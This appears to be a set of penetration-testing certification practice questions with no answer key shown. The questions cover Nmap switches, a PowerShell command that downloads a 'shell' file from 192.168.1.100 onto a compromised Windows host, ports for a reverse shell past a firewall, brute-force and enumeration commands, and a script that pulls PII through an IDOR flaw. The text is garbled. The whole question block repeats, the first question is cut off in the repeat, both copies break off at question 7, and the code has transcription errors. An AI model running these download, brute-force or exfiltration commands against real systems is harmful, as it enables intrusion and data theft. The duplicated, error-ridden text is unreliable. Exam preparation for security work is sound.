1. A penetration tester needs port scan results to be processed by multiple security
products that utilize different data formats. Which of the following switches is
necessary to accomplish this requirement?
A. -oX
B. -iL
C. -oA
D. -oG
2. During a penetration test, a limited-privilege shell is obtained on a Windows 7 host.
The penetration tester identifies PowerShell version 2.0 is accessible on the host.
Which of the following PowerShell commands can be used to download a remote file
hosted on an HTTP server?
A. Copy-Item -Source \\192.168.1.100\http\shell.psl -Destination C:\temp\
B. SWebClient = New-Object System.Net.WebClient
SWebClient.DownloadFile (“http://192.168.1.100/shell.psl”,
“C:\temp\shell.psl”)
C. Invoke-WebRequest -URI “http://192.168.1.100/shell.psl” -OutFile
“C:\temp\shell.psl”)
D. Import-Module BitsTransfer
Start-BitsTransfer -source “c:\temp\shell.pal” -destination
“http://192.168.1.100/shell.psl”
3. Joe, a penetration tester, was able to exploit a web application behind a firewall. He is
trying to get a reverse shell back to his machine, but the firewall blocks the outgoing
traffic. Ports for which of the following should the security consultant use to have the
HIGHEST chance to bypass the firewall?
A. SMB
, B. SMTP
C. FTP
D. DNS
4. A penetration tester observes 500 targets with the same potential vulnerability. Which
of the following is the MOST appropriate step to continue the penetration test?
A. Assume a false positive and retest the target network.
B. Ignore the vulnerable targets as they are honeypots.
C. Contact the client to validate the vulnerability.
D. Verify the finding by running a loop in a script.
5. Which of the following bash code snippets can transform an encoded string into a
human readable form?
A. touch b64. txt | | base64 -d 'Y29tcHRpYQo=' > b64.txt
cat b64. txt
B. cat b64. txt && touch b64. txt
base64 -d 'Y29tcHRpyQo=’)
C. touch b64. txt && echo Y29tcHRpYQo= < b64. txt
base64 -d b64. txt
D. echo Y29tCHRpYQo= > b64. txt
base64 -d b64. txt
, 6. A penetration tester ran an Nmap scan against a target and received the following
output
Starting Nmap 7.60 (httpa://nmap.org) at 2019-04-22 13:58 EDT
Nmap scan rep
Host is up (1.0s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open Microsoft-ds
3089/tcp open Ms-term-serv
Which of the following commands would be best for the penetration tester to execute
NEXT to discover any weaknesses or vulnerabilities?
A. onesixtyone -d 192.168.121.1
B. enum4linux -w 192. 168.121.1
C. snmpwalk -c public 192.168. 121.1
D. medusa -h 192.168.121.1 -U users.txt -P passwords. txt -M ssh
7. During an engagement an unsecure direct object reference vulnerability was
discovered that allows the extraction of highly sensitive PII. The tester is required to
extract and then exfil the information from a web application with identifiers 1
through 1000 inclusive When running the following script, an error in encountered
#usr/bin/ python
Import requests
url = “https://www.comptia.org?id=”
for i in range (1,1001):
url += i
req = requests.get(url)
if req.status_code == 200:
print(req.text)
products that utilize different data formats. Which of the following switches is
necessary to accomplish this requirement?
A. -oX
B. -iL
C. -oA
D. -oG
2. During a penetration test, a limited-privilege shell is obtained on a Windows 7 host.
The penetration tester identifies PowerShell version 2.0 is accessible on the host.
Which of the following PowerShell commands can be used to download a remote file
hosted on an HTTP server?
A. Copy-Item -Source \\192.168.1.100\http\shell.psl -Destination C:\temp\
B. SWebClient = New-Object System.Net.WebClient
SWebClient.DownloadFile (“http://192.168.1.100/shell.psl”,
“C:\temp\shell.psl”)
C. Invoke-WebRequest -URI “http://192.168.1.100/shell.psl” -OutFile
“C:\temp\shell.psl”)
D. Import-Module BitsTransfer
Start-BitsTransfer -source “c:\temp\shell.pal” -destination
“http://192.168.1.100/shell.psl”
3. Joe, a penetration tester, was able to exploit a web application behind a firewall. He is
trying to get a reverse shell back to his machine, but the firewall blocks the outgoing
traffic. Ports for which of the following should the security consultant use to have the
HIGHEST chance to bypass the firewall?
A. SMB
, B. SMTP
C. FTP
D. DNS
4. A penetration tester observes 500 targets with the same potential vulnerability. Which
of the following is the MOST appropriate step to continue the penetration test?
A. Assume a false positive and retest the target network.
B. Ignore the vulnerable targets as they are honeypots.
C. Contact the client to validate the vulnerability.
D. Verify the finding by running a loop in a script.
5. Which of the following bash code snippets can transform an encoded string into a
human readable form?
A. touch b64. txt | | base64 -d 'Y29tcHRpYQo=' > b64.txt
cat b64. txt
B. cat b64. txt && touch b64. txt
base64 -d 'Y29tcHRpyQo=’)
C. touch b64. txt && echo Y29tcHRpYQo= < b64. txt
base64 -d b64. txt
D. echo Y29tCHRpYQo= > b64. txt
base64 -d b64. txt
, 6. A penetration tester ran an Nmap scan against a target and received the following
output
Starting Nmap 7.60 (httpa://nmap.org) at 2019-04-22 13:58 EDT
Nmap scan rep
Host is up (1.0s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open Microsoft-ds
3089/tcp open Ms-term-serv
Which of the following commands would be best for the penetration tester to execute
NEXT to discover any weaknesses or vulnerabilities?
A. onesixtyone -d 192.168.121.1
B. enum4linux -w 192. 168.121.1
C. snmpwalk -c public 192.168. 121.1
D. medusa -h 192.168.121.1 -U users.txt -P passwords. txt -M ssh
7. During an engagement an unsecure direct object reference vulnerability was
discovered that allows the extraction of highly sensitive PII. The tester is required to
extract and then exfil the information from a web application with identifiers 1
through 1000 inclusive When running the following script, an error in encountered
#usr/bin/ python
Import requests
url = “https://www.comptia.org?id=”
for i in range (1,1001):
url += i
req = requests.get(url)
if req.status_code == 200:
print(req.text)
